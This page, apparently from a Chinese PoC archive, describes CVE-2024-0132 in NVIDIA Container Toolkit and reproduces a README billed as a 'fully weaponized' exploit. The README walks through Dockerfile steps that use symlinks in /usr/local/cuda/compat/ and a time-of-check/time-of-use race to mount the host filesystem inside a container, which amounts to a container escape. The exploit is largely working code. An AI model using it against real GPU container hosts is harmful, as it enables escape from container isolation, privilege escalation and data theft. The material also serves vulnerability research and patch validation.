关联漏洞
标题:
NVIDIA Container Toolkit 安全漏洞
(CVE-2024-0132)
描述:NVIDIA Container Toolkit是美国英伟达(NVIDIA)公司的一个容器工具包。允许用户构建和运行 GPU 加速的容器。 NVIDIA Container Toolkit 1.16.1及之前版本存在安全漏洞,该漏洞源于在默认配置下使用时包含检查时间使用时间(TOCTOU)漏洞,成功利用此漏洞可能会导致代码执行、拒绝服务、权限提升、信息泄露和数据篡改。
描述
CVE-2024-0132 – Fully Weaponized NVIDIA Container Toolkit Exploit
介绍
# CVE-2024-0132
CVE-2024-0132 PoC
Let's start by deciding on a base image. The arrangement of libraries in the system depends on what it will be. For example, for `alpine` it will be `/usr/lib64/`, for `ubuntu` it will be `/usr/lib/x86_64-linux-gnu`. We will use `ubuntu` as a base image.
```dockerfile
FROM ubuntu
```
The nvidia containter toolkit checks the libraries in `/usr/local/cuda/compat/` inside the container and then mounts them in the main library directory, for this image (`ubuntu`) this would be `/usr/lib/x86_64-linux-gnu`.
Links are also mounted, so you can mount any file and directory from the image to `/usr/lib/x86_64-linux-gnu`. This checks that the link is resolved inside the container, it cannot use multiple `../` for path traversal. However, this can be circumvented by using the in-container mount via `/usr/local/cuda/compat/` twice, hence TOCTOU.
Read more about the mechanism for mounting from `/usr/local/cuda/compat/`:
- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_container.c#L61
- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_mount.c#L768
```dockerfile
RUN mkdir -p /usr/local/cuda/compat/
```
Create two directories:
1. The original directory will contain a regular file with the contents of `test`
```dockerfile
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
```
2. The second directory with the same name will contain a link with path traversal instead of a file.
```dockerfile
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
```
The name `libdxcore.so` is chosen to satisfy filters. The major version (1337) must be different from the real driver version.
Create two links in `/usr/local/cuda/compat/`:
1. The first link will substitute the contents of the original directory `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/` for `/pwn/libdxcore.so.1337/`
```dockerfile
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
```
2. The second link mount `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs` to `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs`. During the check it will be a normal file, but at the moment of the mount it will be a link that was in `/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs`, thus the host filesystem will be mounted in `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/`.
```dockerfile
RUN ln -s /usr/lib64/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2
```
文件快照
[4.0K] /data/pocs/7f8776a0f776130eb9d893634d0983a386b00e70
├── [ 502] Dockerfile
└── [2.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。